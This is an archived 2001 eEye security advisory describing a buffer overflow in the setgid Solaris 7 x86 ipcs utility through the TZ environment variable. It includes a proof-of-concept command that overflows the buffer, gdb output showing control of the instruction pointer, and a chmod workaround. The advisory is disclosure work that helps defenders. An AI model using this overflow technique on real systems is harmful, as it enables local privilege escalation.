OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Marc Maiffret (marcEEYE.COM)
Date: Thu Apr 12 2001 - 20:07:08 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Solaris ipcs vulnerability

    Release Date:
    April 11, 2001

    Systems Affected:
    Solaris 7 (x86)
    Other versions of Solaris are most likely affected also.

    Discovered by:
    Riley Hassell rileyeeye.com

    Description:
    We have discovered a buffer overflow in the /usr/bin/i86/ipcs utility
    provided with Solaris 7. The problem exists in the parsing of the TZ
    (TIMEZONE) environment variable. By exploiting this vulnerability an
    attacker can achieve local sys group privileges. IPCS is used for gathering
    information on active inter-process communication facilities. Exploitation
    of this vulnerability would be very difficult, but not impossible.

    bash-2.03$ TZ=`perl -e 'print "A"x1035'`
    bash-2.03$ /usr/bin/i86/ipcs
    IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
    Message Queue facility inactive.
    T ID KEY MODE OWNER GROUP
    Shared Memory:
    m 0 0x500004d3 --rw-r--r-- root root
    Semaphore facility inactive.
    Segmentation Fault (core dumped)

    Note: [buffer] is any 1036 (or so) character string. A's...

    bash-2.03$ su root
    Password:
    # gdb /usr/bin/i86/ipcs core
    GNU gdb 5.0
    Copyright 2000 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    <snip>
    #0 0x41414141 in ?? ()
    (gdb) info reg eip
    eip 0x41414141 0x41414141
    (gdb)

    Vendor Status:
    Sun Microsystems has been contacted. They are currently working on patches
    for this and other related vulnerabilities eEye has discovered.

    Workaround:
    chmod –s /usr/bin/i86/ipcs
    This will remove the setgid bit from /usr/bin/i86/ipcs, therefore if someone
    does exploit this vulnerability, they won’t gain higher privileges.

    Greetings:
    ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, Loki, and last
    but not least… Speakeasy.net

    Copyright (c) 1998-2001 eEye Digital Security
    Permission is hereby granted for the redistribution of this alert
    electronically. It is not to be edited in any way without express consent of
    eEye. If you wish to reprint the whole or any part of this alert in any
    other medium excluding electronic medium, please e-mail alerteEye.com for
    permission.

    Disclaimer
    The information within this paper may change without notice. Use of this
    information constitutes acceptance for use in an AS IS condition. There are
    NO warranties with regard to this information. In no event shall the author
    be liable for any damages whatsoever arising out of or in connection with
    the use or spread of this information. Any use of this information is at the
    user's own risk.

    Feedback
    Please send suggestions, updates, and comments to:

    eEye Digital Security
    http://www.eEye.com
    infoeEye.com